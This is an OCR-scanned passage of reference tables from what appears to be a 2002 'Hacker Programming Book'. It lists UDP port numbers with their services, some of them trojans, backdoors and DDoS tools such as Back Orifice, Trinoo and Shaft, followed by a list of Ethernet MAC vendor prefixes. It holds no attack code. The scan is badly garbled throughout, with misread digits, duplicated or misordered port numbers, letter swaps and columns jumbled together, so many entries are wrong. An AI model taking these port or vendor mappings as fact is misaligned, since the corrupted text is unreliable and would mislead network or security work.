7003 


volume location database 


UDP 


8033 


MindPrint 


UDP 


7004 


AFS/Kerberos authentication 


UDP 


8080 


HTTP 


service 




UDP 


8130 


INDIGO-VRMI 


UDP 


7005 


volume managment server 


UDP 


8131 


INDIGO-VBCP 


UDP 


7006 


error interpretation service 


UDP 


8160 


Patrol 


UDP 


7007 


basic overseer process 


UDP 


8161 


Patrol SNMP 


UDP 


7008 


server— to— server updater 


UDP 


8200 


TRIVNET 


UDP 


7009 


remote cache manager service 


UDP 


8201 


TRIVNET 


UDP 


7010 


onlinet uninterruptable 


UDP 


8204 


LM Perfworks 


power supplies 


UDP 


8205 


LM Instmgr 


UDP 


7011 


Talon Discovery Port 


UDP 


8206 


LM Dta 


UDP 


7012 


Talon Engine 


UDP 


8207 


LM SServer 


UDP 


7013 


Microtalon Discovery 


UDP 


8208 


LM Webwatcher 


UDP 


7014 


Microtalon Communications 


UDP 


8351 


Server Find 


UDP 


7015 


Talon Webserver 


UDP 


8376 


Cruise ENUM 


UDP 


7020 


DP Serve 


UDP 


8377 


Cruise SWROUTE 


UDP 


7021 


DP Serve Admin 


UDP 


8378 


Cruise CONFIG 


UDP 


7070 


ARCP 


UDP 


8379 


Cruise DIAGS 


UDP 


7099 


lazy-ptop 


UDP 


8380 


Cruise UPDATE 


UDP 


7100 


X Font Service 


UDP 


8400 


cvd 


UDP 


7121 


Virtual Prototypes License 


UDP 


8401 


sabarsd 


Manager 




UDP 


8402 


abarsd 


UDP 


7141 


vnet . ibm. com 


UDP 


8403 


admind 


UDP 


71 70 


Audio (inclusive) for 


UDP 


8450 


npmp 


incoming traffic only 


UDP 


8473 


Virtual Point to Point 
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UDP 


8554 


RTSP Alternate (see port 


554) 






UDP 


8133 


iBus 


UDP 


8163 


MC-APPSERVER 


UDP 


8764 


OPENQUEUE 


UDP 


8165 


Ultraseek HTTP 


UDP 


8804 


truecm 


UDP 


8880 


CDDBP 


UDP 


8888 


NewsEDGE server UDP (UDP 


1) 






UDP 


8889 


NewsEDGE server broadcast 


UDP 


8890 


NewsEDGE client broadcast 


UDP 


8891 


Desktop Data UDP 3: NESS 


application 


UDP 


8892 


Desktop Data UDP 4: FARM 


produci 




UDP 


8893 


Desktop Data UDP 5: 


NewsEDGE/Web application 


UDP 


8894 


Desktop Data UDP 6: COAL 


application 


UDP 


8900 


JMB-CDS 1 


UDP 


8901 


JMB-CDS 2 


UDP 


9000 


CSlistener 


UDP 


9090 


WebSM 


UDP 


9160 


NetLOCKl 


UDP 


9161 


NetL0CK2 


UDP 


9162 


NetL0CK3 


UDP 


9163 


NetL0CK4 


UDP 


9164 


NetL0CK5 


UDP 


9200 


WAP connectionless session 


service 




UDP 


9201 


WAP session service 


UDP 


9202 


WAP secure connectionless 


session service 


UDP 


9203 


WAP secure session service 


UDP 


9204 


WAP vCard 


UDP 


9205 


WAP vCal 


UDP 


9206 


WAP vCard Secure 


UDP 


9207 


WAP vCal Secure 


UDP 


9321 


guibase 


UDP 


9325 


DDOS communication UDP 


UDP 


9343 


MpIdcMgr 


UDP 


9344 


Mphlpdmc 


UDP 


9314 


fjdmimgr 


UDP 


9396 


fjinvmgr 


UDP 


9391 


MpIdcAgt 


UDP 


9500 


ismserver 


UDP 


9535 


Remote man server 


UDP 


9594 


Message System 


UDP 


9595 


Ping Discovery Service 


UDP 


9600 


MICROMUSE-NCPW 


UDP 


9153 


rasadv 


UDP 


9816 


Session Director 


UDP 


9888 


CYBORG Systems 


UDP 


9898 


MonkeyCom 


UDP 


9899 


SCTP TUNNELING 


UDP 


9900 


IUA 


UDP 


9909 


domaintime 


UDP 


9950 


APCPCPLUSWIN1 


UDP 


9951 


APCPCPLUSWIN2 


UDP 


9952 


APCPCPLUSWIN3 


UDP 


9992 


Palace 


UDP 


9993 


Palace 


UDP 


9994 


Palace 


UDP 


9995 


Palace 


UDP 


9996 


Palace 


UDP 


9991 


Palace 


UDP 


9998 


Distinct32 


UDP 


9999 


distinct 


UDP 


10000 


Network Data Management 


Protocol 




UDP 


10001 


rscsl 


UDP 


10002 


rscs2 


UDP 


10003 


rscs3 


UDP 


10004 


rscs4 


UDP 


10005 


rscs5 


UDP 


10006 


rscs6 



UDP 10001 MVS Capacity 

UDP 10008 rscs8 

UDP 10009 rscs9 

UDP 10010 rscsa 

UDP 10011 rscsb 

UDP 10012 qmaster 

UDP 10061 Portai of Doom remote 

access backdoor 

UDP 10080 Amanda 

UDP 10113 NetlQ Endpoint 

UDP 10114 NetlQ Qcheck 

UDP 10115 Ganymede Endpoint 

UDP 10128 BMC— PERFORM— SERVICE DAEMON 

UDP 10161 Portai of Doom remote 

access backdoor 

UDP 10288 Blocks 

UDP 10498 DDOS Communication UDP 

UDP 11000 IRISA 

UDP 11001 Metasys 

UDP Hill Virai Computing Environment 
(VCE) 

UDP 11361 ATM UHAS 

UDP 11120 h323 Cali Signal Alternate 

UDP 12000 IBM Enterprise Extender SNA 
XID Exchange 

UDP 12001 IBM Enterprise Extender SNA 
COS Network Priority 

UDP 12002 IBM Enterprise Extender SNA 
COS High Priority 

UDP 12003 IBM Enterprise Extender SNA 
COS Medium Priority 

UDP 12004 IBM Enterprise Extender SNA 

COS Low Priority 

UDP 121 12 HiveP 

UDP 12153 tsaf port 

UDP 13160 I-ZIPQD 

UDP 13223 PowWow Client 

UDP 13224 PowWow Server 

UDP 13120 BPRD Protocol (VERITAS 

NetBackup) 

UDP 13121 BPBRM Protocol (VERITAS 
NetBackup) 

UDP 13122 BP Java MSVC Protocol 

UDP 13182 VERITAS NetBackup 

UDP 13183 VOPIED Protocol 

UDP 13818 DSMCC Config 

UDP 13819 DSMCC Session Messages 

UDP 13820 DSMCC Pass-Thru Messages 

UDP 13821 DSMCC Download Protocol 

UDP 13822 DSMCC Channel Change 

Protocol 

UDP 14001 ITU SCCP (SS!) 

UDP 16360 netserialextl 

UDP 16361 netserialext2 

UDP 16361 netserialext3 

UDP 16368 netserialext4 

UDP 1 6991 INTEL-RCI-MP 

UDP 11001 isode-dua 

UDP 11219 Chipper 

UDP 18000 Beckman Instruments Inc. 

UDP 18181 OPSEC CVP 

UDP 18182 OPSEC UFP 

UDP 18183 OPSEC SAM 

UDP 18184 OPSEC LEA 

UDP 18185 OPSEC OMI 

UDP 18181 OPSEC ELA 

UDP 18463 AC Cluster 

UDP 18153 Shaft distributed attack 

tool handler - agent 

UDP 18888 APCNECMP 

UDP 19283 Key Server for SASSAFRAS 

UDP 19315 Key Shadow for SASSAFRAS 

UDP 19410 hp-sco 

UDP 19411 hp-sca 

UDP 19412 HP-SESSMON 

UDP 19541 JCP Client 

UDP 20000 DNP 
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UDP 20432 
agent 

UDP 20670 
UDP 20999 
UDP 21590 
UDP 21845 
UDP 21846 
Services 
UDP 21847 
Services 
UDP 21848 



Shaft distributed attack 



Traci 

AT Hand MMP 
VoFR Gateway 
webphone 
Net Speak Corp. 



UDP 47808 Building Automation and 



Directory 



Control Networks 




UDP 


48000 


Nimbus 


Controller 


UDP 


48001 


Nimbus 


Spooler 


UDP 


48002 


Nimbus 


Hub 


UDP 


48003 


Nimbus 


Gateway 


UDP 


54321 


Orifice 2000 (UDP) 



NetSpeak Corp. Connection 



Automatic 



NetSpeak Corp. 
Cali Distribution 

UDP 21849 NetSpeak Corp. Credit 

Processing System 

UDP 22000 SNAPenetlO 

UDP 22001 OptoControl 

UDP 22273 wnn6 

UDP 22555 Vocaltec Internet Phone 
UDP 22800 Telerate Information 
Platform LAN 

UDP 22951 Telerate Information 
Platform WAN 



UDP 


24000 


med-ltp 


UDP 


24001 


med—fsp—rx 


UDP 


24002 


med—fsp—tx 


UDP 


24003 


med-supp 


UDP 


24004 


med—ovw 


UDP 


24005 


med-ci 


UDP 


24006 


med-net-svc 


UDP 


24386 


Intel RCI 


UDP 


24554 


BINKP 


UDP 


25000 


icl-twobasel 


UDP 


25001 


icl-twobase2 


UDP 


25002 


icl-twobase3 


UDP 


25003 


icl-twobase4 


UDP 


25004 


icl-twobase5 


UDP 


25005 


icl-twobase6 


UDP 


25006 


icl-twobase7 


UDP 


25007 


icl-twobase8 


UDP 


25008 


icl-twobase9 


UDP 


25009 


icl-twobaselO 


UDP 


25793 


Vocaltec Address 


UDP 


26000 


quake 


UDP 


26208 


wnn 6-ds 


UDP 


27374 


Linux . Ramen . Worm 



Trinoo distributed attack 



Attribute Certificate 



Linux) 
UDP 27444 
tool Master 
UDP 27999 
Services 

UDP 31335 Trinoo distributed attack 
tool Bcast Daemon registration port 
UDP 31337 Back Orifice (Windows 
Trojan ) 

UDP 31338 Deep Back Orifice (Windows 
Trojan ) 

UDP 31789 Hack-A-Tack Remote Access 
Trojan (Windows Trojan) 
UDP 31791 Hack-A-Tack Remote Access 
Trojan (Windows Trojan) 
UDP 32768 Filenet TMS 
Filenet RPC 
Filenet NCH 
RPC 

Trinity v3 distributed 



UDP 
UDP 
UDP 
UDP 



32769 
32770 
32780 
33270 
attack tool 
UDP 33434 
UDP 34555 
tool Handler 



traceroute use 
Trinoo distributed attack 



UDP 


36865 


KastenX Pipe 


UDP 


40841 


CSCP 


UDP 


44818 


Rockwell Encapsulation 


UDP 


45678 


EBA PRISE 


UDP 


45966 


SSRServerMgr 


UDP 


47557 


Databeam Corporation 


UDP 


47624 


Direct Play Server 


UDP 


47806 


ALC Protocol 
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Ethernet MAC Address Vendor ( 

000001 SuperLAN-2U 

BBN (was internai usage only, no longer 

000002 used) 

000009 powerpipes? 
00000C Cisco 
00000E Fujitsu 
00000F NeXT 

00001 0 Hughes LAN Systems (formerly Sytek) 

00001 1 Tektronix 

000015 Datapoint Corporation 

Webster Computer Corporation 

000018 Appletalk/Ethernet Gateway 

00001 A AMD (?) 

00001 B Novell (now Eagle Technology) 

00001 C JDR Microdevices generic, NE2000 drivers 

00001 D Cabletron 

00001 F Cryptall Communications Corp. 

000020 DIAB (Data Intdustrier AB) 

000021 SC&C (PAM Soft&Hardware also reported) 

000022 Visual Technology 

000023 ABB Automation AB, Dept. Q 

000024 Olicom 

000029 IMC 

00002A TRW 

NRC - Network Resources Corporation - 

00002C MultiGate Hub1+, Hub2, etc 

GPT Limited (reassigned from GEC 

000032 Computers Ltd) 

000037 Oxford Metrics Ltd 

00003B Hyundai/Axil Sun Sparc Station 2 clone 

00003C Auspex 

00003D AT&T 

00003F Syntrex Ine 

000044 Castelle 

000046 ISC-Bunker Ramo, An Olivetti Company 

000048 Epson 

000049 Apricot Ltd. 

00004B APT -ICL also reported 

00004C NEC Corporation 

00004F Logicraft 386-Ware P.C. Emulator 

000051 Hob Electronic Gmbh & Co. KG 

000052 Optical Data Systems 
000055 AT&T 

000058 Racore Computer Products Ine 

SK (Schneider & Koch in Europe and 

00005A Syskonnect outside of Europe) 

00005A Xerox 806 (unregistered) 

00005B Eltec 



00005D RCE 

00005E U.S. Department of Defense (IANA) 

00005F Sumitomo 

000061 Gateway Communications 

000062 Honeywell 

000063 Hewlett-Packard Lan Probe 

000064 Yokogawa Digital Computer Corp 

000065 Network General 

000066 Talaris 

Concord Communications, Ine (although 
000069 someone said Silicon Graphics) 

00006B MIPS 

00006D Case 

00006E Artisoft, Inc. 

00006F Madge Networks Ltd. Token-ring adapters 

000068 Rosemount Controls 

00006F Madge Networks Ltd 

000073 DuPont 

000075 Bell Northern Research (BNR) 

Interphase [Used in other systems, e.g. 

000077 MIPS, Motorola] 

000078 Labtam Australia 

Networth Incorporated [bought by Compaq, 

000079 used in Netelligent series] 

00007A Ardent 

00007B Research Machines 

Cray Research Superserversjnc [Also 
00007D Harris (3M) (old)] 

00007E NetFRAME multiprocessor network servers 

00007F Linotype-Hell AG Linotronic typesetters 

Cray Communications (formerly Dowty 
Network Services) [Also shows as "Harris 

000080 (3M) (new)" and/or "Imagenf?)" elsewhere] 

000081 Synoptics 

Tadpole Technology [had Optical Data 

000083 Systems which is wrong according to both] 

000084 Aquila (?), ADI Systems lnc.(?) 

Gateway Communications Inc. (also 

000086 Megahertz Corporation?) 

000087 Hitachi 

000089 Cayman Systems Gatorbox 

00008A Datahouse Information Systems 

Solbourne(?), Jupiter(?) (l've had 
00008E confirming mail on Solbourne) 

000092 Unisys, Cogent (both reported) 

000093 Proteon 

000094 Asante MAC 

000095 Sony/Tektronix 

000097 Epoch 

000098 Cross Com 
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000099 Memorex Telex Corporations 

00009F Ameristar Technology 

0000A0 Sanyo Electronics 

0000A2 Wellfleet 

0000A3 Network Application Technology (NAT) 

0000A4 Acorn 

0000A5 Compatible Systems Corporation 

Network General (internai assignment, not 
0000A6 forproducts) 

Network Computing Devices (NCD) X- 
0000A7 terminals 

0000A8 Stratus Computer, Inc. 

0000A9 Network Systems 

0000AA Xerox Xerox machines 

Conware Netzpartner [had Apollo, claimed 
0000AC incorrect] 

Dassault Automatismes et 
0000AE Telecommunications 

Nuclear Data Acquisition Interface Modules 

0000AF (AIM) 

0000B0 RND (RAD Network Devices) 

0000B1 Alpha Microsystems Inc. 

0000B3 CIMLinc 

0000B4 Edimax 

0000B5 Datability Terminal Servers 

0000B6 Micro-matic Research 

0000B7 Dove Fastnet 

TRI-DATA Systems Inc. Netway products, 
0000BB 3274 emulators 

0000BC Allen-Bradley 

Western Digital now SMC (Std. 
0000C0 Microsystems Corp.) 

0000C1 Olicom A/S 

0000C5 Farallon Computing Ine 

HP Intelligent Networks Operation (formerly 
0000C6 Eon Systems) 

0000C8 Altos 

0000C9 Emulex Terminal Servers, Print Servers 

LANcity Cable Modems (now owned by 
0000CA BayNetworks) 

0000CC Densan Co., Ltd. 

0000CD Industriai Research Limited 

0000D0 Develcon Electronics, Ltd. 

0000D1 Adaptec, Inc. "Nodem" product 

0000D2 SBE Ine 

0000D3 Wang Labs 

0000D4 PureData 

0000D7 Dartmouth College (NED Router) 

old Novell NEIOOO's (before about 1987?) 
0000D8 (also3Com) 

0000DD Gould 

0000DE Unigraph 

0000E1 Hitachi (laptop built-in) 

0000E2 Acer Counterpoint 



0000E3 Integrated Micro Products Ltd 

0000E4 mips? 

0000E6 Aptor Produits De Comm Indust 

0000E8 Accton Technology Corporation 

0000E9 ISICAD, Inc. 

0000ED Aprii 

Network Designers Limited [also KNX Ltd, 

0000EE a former division] 

0000EF Alantec 

0000F0 Samsung 

Spider Communications (Montreal, not 

0000F2 Spider Systems) 

0000F3 Gandalf Data Ltd. - Canada 

0000F4 Allied Telesis, Inc. 

0000F6 A.M.C. (Applied Microsystems Corp.) 

0000F8 DEC 

0000FB Rechner zur Kommunikation 

0000FD High Level Hardware (Orion, UK) 

0000FF Camtec Electronics (UK) Ltd. 

BBN (Bolt Beranek and Newman, Inc.) 

000102 internai usage (not registered) 

000143 IEEE 802 

000163 NDC (National Datacomm Corporation) 

W&G (Wandel & Goltermann) [incorrect 

0001 68 according to W&G] 

0001 C8 Thomas Conrad Corp. 

0001 FA Compaq (PageMarq printers) 

000204 Novell NE3200 

000205 Hamilton (Sparc Clones) 

000216 ESI (Extended Systems, Ine) print servers 

000288 Global Village (PCcard in Mac portable) 

0003C6 Morning Star Technologies Ine 

000400 Lexmark (Print Server) 

0004AC IBM PCMCIA Ethernet adapter. 

000502 Apple (PCI bus Macs) 

00059A PowerComputing (Mac clone) 

0005A8 PowerComputing Mac clones 

Hewlett-Packard JetDirect token-ring 

00060D interfaces 

000629 IBM RISC6000 system 

00067C Cisco 

0006C1 Cisco 

000701 Racal-Datacom 

00070D Cisco 251 1 Token Ring 

000852 Technically Elite Concepts 

000855 Fermilab 

0008C7 Compaq 

001 01 1 Cisco Systems Cisco 75xx 

00101 F Cisco 

001 02F Cisco Cisco 5000 

001 04B 3Com 3C905-TX PCI 

00 1 079 Cisco 5500 Router 
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00107A Ambicom (was Tandy?) 

001 0F6 Cisco 

001700 Kabel 

002000 Lexmark (Print Server) 

002008 Cable & Computer Technology 

00200C Adastra Systems Corp 

00201 1 Canopus Co Ltd 

002017 Orbotech 

002018 Realtek 

00201 A Nbase 

Control Technology Ine (Industriai Controls 

002025 and Network Interfaces) 

002028 Bloomberg 

ATML (Advanced Telecommunications 

00202B Modules, Ltd.) 

IBM (International Business Machines) 

002035 mainframes, Etherjet printers 

002036 BMC Software 
002042 Datametrics Corp 
002045 SolCom Systems Limited 
002048 Fore Systems Ine 
00204B Autocomputer Co Ltd 
00204C Mitron Computer Pte Ltd 
002056 Neoproducts 

002061 Dynatech Communications Ine 

002063 Wipro Infotech Ltd 

002066 General Magic Ine 

002067 Node Runner Ine 

00206B Minolta Co., Ltd Network printers 

002078 Runtop Ine 

3COM SuperStack II UPS management 

002085 module 

00208A Sonix Communications Ltd 

00208B Focus Enhancements 

00208C Galaxy Networks Ine 

002094 Cubix Corporation 

0020A5 Newer Technology 

0020A6 Proxim Ine 

0020AF 3COM Corporation 

0020B6 Agile Networks Ine 

0020B9 Metricom, Inc. 

0020C5 EagleNE2000 

0020C6 NECTEC 

Versalynx Corp. "The One Port" terminal 

0020D0 server 

0020D2 RAD Data Communications Ltd 

0020D3 OST (Ouet Standard Telematique) 

0020D8 NetWave 

0020DA Xylan 

0020DC Densitron Taiwan Ltd 

PreMax PE-200 (PCMCIA NE2000-clone 

0020E0 card, sold by InfoExpress) 



0020E5 Apex Data 

0020EE Gtech Corporation 

0020F6 Net Tek & Karlnet Ine 

0020F8 Carrera Computers Ine 

004001 Zero One Technology Co Ltd (ZyXEL?) 

TRENDware International Inc.; Linksys; 

004005 Simple Net; ali three reported 

004009 Tachibana Tectron Co Ltd 
00400B Crescendo (now owned by Cisco) 
00400C General Micro Systems, Inc. 
00400D LANNET Data Communications 

004010 Sonic Mac Ethernet interfaces 

Facilities Andover Environmental 

00401 1 Controllers 

004013 NTT Data Communication Systems Corp 

004014 ComsoftGmbh 

004015 Ascom 

00401 7 XCd XJet - HP printer server card 

AST Pentium/90 PC (emulating AMD EISA 

00401 C card) 

00401 F Colorgraph Ltd 

004020 Pilkington Communication 

004023 Logic Corporation 

004025 Molecular Dynamics 

004026 Melco Ine 

SMC Massachusetts [Had:Sigma (?), 

004027 maybe the "S"?] 

004028 Netcomm 
00402A Canoga-Perkins 
00402B TriGem 

00402F Xlnt Designs Ine (XDI) 

004030 GK Computer 

004032 Digital Communications 

004033 Addtron Technology Co., Ltd. 
004036 TribeStar 

004039 Optec Daiichi Denko Co Ltd 

00403C Forks, Inc. 

004041 Fujikura Ltd. 

004043 Nokia Data Communications 

004048 SMD Informatica S.A. 

00404C Hypertec Pty Ltd. 

00404D Telecomm Techniques 

00404F Space & Naval Warfare Systems 

004050 Ironics, Incorporated 

004052 Star Technologies Ine 

004054 Thinking Machines Corporation 

004057 Lockheed-Sanders 

004059 Yoshida Kogyo K.K. 

00405B Funasset Limited 

00405D Star-Teklnc 

004066 Hitachi Cable, Ltd. 

004067 Omnibyte Corporation 
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004068 Extended Systems 

004069 Lemcom Systems Ine 
00406A Kentek Information Systems Ine 
00406E Corollary, Inc. 

00406F Sync Research Ine 

004072 Applied Innovation 

004074 Cable and Wireless 

004076 AMP Incorporated 

004078 Wearnes Automation Pte Ltd 

00407F Agema Infrared Systems AB 

004082 Laboratory Equipment Corp 

004085 SAAB Instruments AB 

004086 Michels & Kleberhoff Computer 

004087 Ubitrex Corporation 

Mobuis NuBus (Mac) combination 

004088 video/EtherTalk 

00408A TPS Teleprocessing Sys. Gmbh 

00408C Axis Communications AB 

00408E CXR/Digilog 

00408F WM-Data Minto AB 

Ansel Communications PC NE2000 

004090 compatible twisted-pair ethernet cards 

004091 Procomp Industria Eletronica 

004092 ASP Computer Products, Inc. 

004094 Shographics Ine 

004095 Eagle Technologies [UMC also reported] 

004096 Telesystems SLW Ine 
00409A Network Express Ine 
00409C Transware 

00409D DigiBoard Ethernet-ISDN bridges 

00409E Concurrent Technologies Ltd. 

00409F Lancast/Casat Technology Ine 

0040A4 Rose Electronics 

0040A6 Cray Research Inc. 

0040AA Valmet Automation Ine 

0040AD SMA Regelsysteme Gmbh 

0040AE Delta Controls, Inc. 

0040AF Digital Products, Inc. (DPI). 

0040B4 3COM K.K. 

0040B5 Video Technology Computers Ltd 

0040B6 Computerm Corporation 

0040B9 MACQ Electronique SA 

0040BD Starlight Networks Ine 

0040C1 Bizerba-Werke Wilheim Kraut 

0040C2 Applied Computing Devices 

0040C3 Fischer and Porter Co. 

0040C5 Micom Communications Corp. 

0040C6 Fibernet Research, Inc. 

0040C7 Danpex Corporation 

0040C8 Milan Technology Corp. 

0040CC Silcom Manufacturing Technology Ine 



0040CF Strawberry Tree Ine 

0040D2 Pagine Corporation 

0040D4 Gage Talker Corp. 

0040D7 Studio Gen Ine 

0040D8 Ocean Office Automation Ltd 

0040DC Tritec Electronic Gmbh 

0040DF Digalog Systems, Inc. 

0040E1 Marner International Ine 

0040E2 Mesa Ridge Technologies Ine 

0040E3 Quin Systems Ltd 

0040E5 Sybus Corporation 

0040E7 Amos Instruments & Computer 

0040E9 Accord Systems, Inc. 

0040EA PlainTree Systems Ine 

0040ED Network Controls International Ine 

0040F0 Micro Systems Ine 

0040F1 Chuo Electronics Co., Ltd. 

0040F4 Carneo Communications, Inc. 

0040F5 OEM Engines 

0040F6 Katron Computers Ine 

0040F9 Combinet 

0040FA Microboards Ine 

0040FB Cascade Communications Corp. 

0040FD LXE 

0040FF Telebit Corporation Personal NetBlazer 

004F49 Realtek 

004F4B Pine Technology Ltd. 

00504D Repotec Group 

UMC UM9008 NE2000-compatible ISA 

00504E CardforPC 

3Com Found in a 3Com PCI form factor 

006008 3C905 TX board 

006009 Cisco Catalyst 5000 Ethernet switch 
006025 Active Imaging Inc. 

00602F Cisco 

00603E Cisco 100Mbps interface 

006047 Cisco 

006052 Realtek (RTL 8029 == PCI NE2000) 

00605C Cisco 

006067 Acer Lan 

006070 Cisco routers (2524 and 4500) 

006083 Cisco Systems, Inc. 3620/3640 routers 

00608C 3Com (1990 onwards) 

006094 AMD PCNET PCI 

006097 3Com 

0060B0 Hewlett-Packard 

008000 Multitech Systems Ine 

008001 Periphonics Corporation 

008004 Antlow Computers, Ltd. 

008005 Cactus Computer Inc. 

008006 Compuadd Corporation 



Copyright 2002 Flavio Bernardotti - Tel. (39) 380 7097051 



Hacker Programming Book 



008007 Dlog NC-Systeme 

Jupiter Systems (older MX-600 series 

008009 machines) 

00800D Vosswinkel FU 

00800F SMC (Standard Microsystem Corp.) 

008010 Commodore 

00801 2 IMS Corp. IMS failure analysis tester 

00801 3 Thomas Conrad Corp. 

008015 Seiko Systems Ine 

008016 Wandel & Goltermann 

008017 PFU 

Dayna Communications "Etherprint" 

008019 product 

00801 A Bell Atlantic 

00801 B Kodiak Technology 

00801 C Cisco 

008021 Newbridge Networks Corporation 

008023 Integrated Business Networks 

008024 Kalpana 

008026 Network Products Corporation 

008029 Microdyne Corporation 

00802A Test Systems & Simulations Ine 

00802C The Sage Group PLC 

00802D Xylogics, Inc. Annex terminal servers 

00802E Plexcom, Inc. 

008033 Formation (?) 

008034 SMT-Goupil 

008035 Technology Works 

008037 Ericsson Business Comm. 

008038 Data Research & Applications 
00803B APT Communications, Inc. 
00803D Surigiken Co Ltd 

00803E Synernetics 

00803F Hyundai Electronics 

008042 Force Computers 

008043 Networld Ine 

008045 Matsushita Electric Ind Co 

008046 University of Toronto 

Compex, used by Commodore and DEC at 

008048 least 

008049 Nissin Electric Co Ltd 
00804C Contee Co., Ltd. 
00804D Cyclone Microsystems, Inc. 

008051 ADC Fibermux 

008052 Network Professor 
008057 Adsoft Ltd 

00805A Tulip Computers International BV 

00805B Condor Systems, Inc. 

00805C Agilis(?) 

00805F Compaq Computer Corporation 

008060 Network Interface Corporation 



008062 Interface Co. 

008063 Richard Hirschmann Gmbh & Co 

008064 Wyse 

008067 Square D Company 

008069 Computane Systems 

00806A ERI (Empac Research Inc.) 

00806B Schmid Telecommunication 

00806C Cegelec Projects Ltd 

00806D Century Systems Corp. 

00806E Nippon Steel Corporation 

00806F Onelan Ltd 

008071 SAI Technology 

008072 Microplex Systems Ltd 
008074 Fisher Controls 
008079 Microbus Designs Ltd 
00807B Artel Communications Corp. 
00807C FiberCom 

00807D Equinox Systems Ine 

008082 PEP Modular Computers Gmbh 

008086 Computer Generation Inc. 

008087 Okidata 
00808A Summit (?) 
00808B Dacoll Limited 

00808C Frontier Software Development 

00808D Westcove Technology BV 

00808E Radstone Technology 

008090 Microtek International Ine 

008092 Japan Computer Industry, Inc. 

008093 Xyron Corporation 

008094 Sattcontrol AB 

HDS (Human Designed Systems) X 

008096 terminals 

008098 TDK Corporation 

00809A Novus Networks Ltd 

00809B Justsystem Corporation 

00809D Datacraft Manufactur'g Pty Ltd 

00809F Alcatel Business Systems 

0080A1 Microtest 

0080A3 Lantronix (see also 0800A3) 

0080A6 Republic Technology Ine 

0080A7 Measurex Corp 

CNet Technology Used by Telebit (among 

0080AD others) 

0080AE Hughes Network Systems 

0080AF AllumerCo., Ltd. 

0080B1 Softcom A/S 

0080B2 NET (Network Equipment Technologies) 

0080B6 Themis corporation 

0080BA Specialix (Asia) Pte Ltd 

0080C0 Penril Datability Networks 

0080C2 IEEE 802.1 Committee 
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0080C6 Soho 

0080C7 Xircom, Inc. 

D-Link (also Solectek Pocket Adapters, and 

0080C8 LinkSys PCMCIA) 

0080C9 Alberta Microelectronic Centre 

0080CE Broadcast Television Systems 

0080D0 Computer Products International 

0080D3 Shiva Appletalk-Ethernet interface 

0080D4 Chase Limited 

0080D6 Apple Mac Portable(?) 

0080D7 Fantum Electronics 

0080D8 Network Peripherals 

0080DA Bruel & Kjaer 

0080E0 XTP Systems Ine 

0080E3 Coral(?) 

0080E7 Lynwood Scientific Dev Ltd 

0080EA The Fiber Company 

0080F0 Kyushu Matsushita Electric Co 

0080F1 Opus 

0080F3 Sun Electronics Corp 

0080F4 Telemechanique Electrique 

0080F5 Quantel Ltd 

0080F7 Zenith Communications Products 

0080FB BVM Limited 

0080FE Azure Technologies Ine 

00A000 Bay Networks Ethernet switch 

Infermate International [LAN printer 

00A092 interfaces] 

National Semiconductor [COMPAQ 

00A0D1 Docking Station] 

00A0D2 Allied Telesyn 

00A024 3com 

00A040 Apple (PCI Mac) 

00A0C9 Intel (PR01 00B cards) 

MacSense 100Base-TX Adapter for Mac 

00A0CC Also seen in PCs (?) 

00AA00 Intel 

00B0D0 Computer Products International 

00C000 Lanoptics Ltd 

00C001 Diatek Patient Managment 

00C002 Sercomm Corporation 

00C003 Globalnet Communications 

00C004 Japan Business Computer Co. Ltd 

Livingston Enterprises Ine Portmaster 

00C005 (OEMed by Cayman) 

00C006 Nippon Avionics Co Ltd 

00C007 Pinnacle Data Systems Ine 

00C008 Seco SRL 

00C009 KT Technology (s) Pte Ine 

00C00A Micro Craft 

00C00B Norcontrol A.S. 

00C00C ARK PC Technology, Inc. 



00C00D Advanced Logic Research Ine 

00C00E Psitech Ine 

QNX Software Systems Ltd. [also Quantum 

00C00F Software Systems Ltd] 

00C01 1 Interactive Computing Devices 

00C012 NetspanCorp 

00C013 Netrix 

00C014 Telematics Calabasas 

00C01 5 New Media Corp 

00C01 6 Electronic Theatre Controls 

00C017 Fluke 

00C018 LanartCorp 

00C01A Corometrics Medicai Systems 

00C01B Socket Communications 

00C01C Interlink Communications Ltd. 

00C01D Grand Junction Networks, Inc. 

00C01F S.E.R.C.E.L. 

00C020 Arco Electronic, Control Ltd. 

00C021 Netexpress 

00C023 Tutankhamon Electronics 

00C024 Eden Sistemas De Computacao SA 

00C025 Dataproducts Corporation 

00C027 Cipher Systems, Inc. 

00C028 Jasco Corporation 

00C029 Kabel Rheydt AG 

00C02A Ohkura Electric Co 

00C02B Gerloff Gesellschaft Fur 

00C02C Centrum Communications, Inc. 

00C02D Fuji Photo Film Co., Ltd. 

00C02E Netwiz 

00C02F OkumaCorp 

00C030 Integrated Engineering B. V. 

00C031 Design Research Systems, Inc. 

00C032 l-Cubed Limited 

00C033 Telebit Corporation 

00C034 Dale Computer Corporation 

00C035 Quintar Company 

00C036 Raytech Electronic Corp 

00C039 Silicon Systems 

00C03B Multiaccess Computing Corp 

00C03C Tower Tech S.R.L. 

00C03D Wiesemann & Theis Gmbh 

00C03E Fa. Gebr. Heller Gmbh 

00C03F Stores Automated Systems Ine 

00C040 ECCI 

00C041 Digital Transmission Systems 

00C042 DataluxCorp. 

00C043 Stratacom 

00C044 Emcom Corporation 

00C045 Isolation Systems Ine 

00C046 Kemitron Ltd 
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00C047 Unimicro Systems Ine 

00C048 Bay Technical Associates 

US Robotics Total Control (tm) NETServer 

00C049 Card 

00C04D MitecLtd 

00C04E Comtrol Corporation 

00C04F Dell 

00C050 Toyo Denki Seizo K.K. 

00C051 Advanced Integration Research 

00C055 Modular Computing Technologies 

00C056 Somelec 

00C057 Myco Electronics 

00C058 Dataexpert Corp 

00C059 Nippondenso Corp 

00C05B Networks Northwest Ine 

00C05C ElonexPLC 

00C05D L&N Technologies 

00C05E Vari-Lite Ine 

00C060 ID Scandinavia A/S 

00C061 Solectek Corporation 

Morning Star Technologies Ine May be 

00C063 miswrite of 0003C6 

00C064 General Datacomm Ind Ine 

00C065 Scope Communications Ine 

00C066 Docupoint, Inc. 

00C067 United Barcode Industries 

00C068 Philp Drake Electronics Ltd 

00C069 California Microwave Ine 

00C06A Zahner-Elektrik Gmbh & Co KG 

00C06B OSI Plus Corporation 

00C06C SVEC Computer Corp 

00C06D Boca Research, Inc. 

00C06F Komatsu Ltd 

00C070 Sectra Secure-Transmission AB 

00C071 Areanex Communications, Inc. 

00C072 KNXLtd 

00C073 Xedia Corporation 

00C074 Toyoda Automatic Loom Works Ltd 

00C075 Xante Corporation 

00C076 I-Data International A-S 

00C077 Daewoo Telecom Ltd 

00C078 Computer Systems Engineering 

00C079 Fonsys Co Ltd 

00C07A Priva BV 

Ascend Communications ISDN 

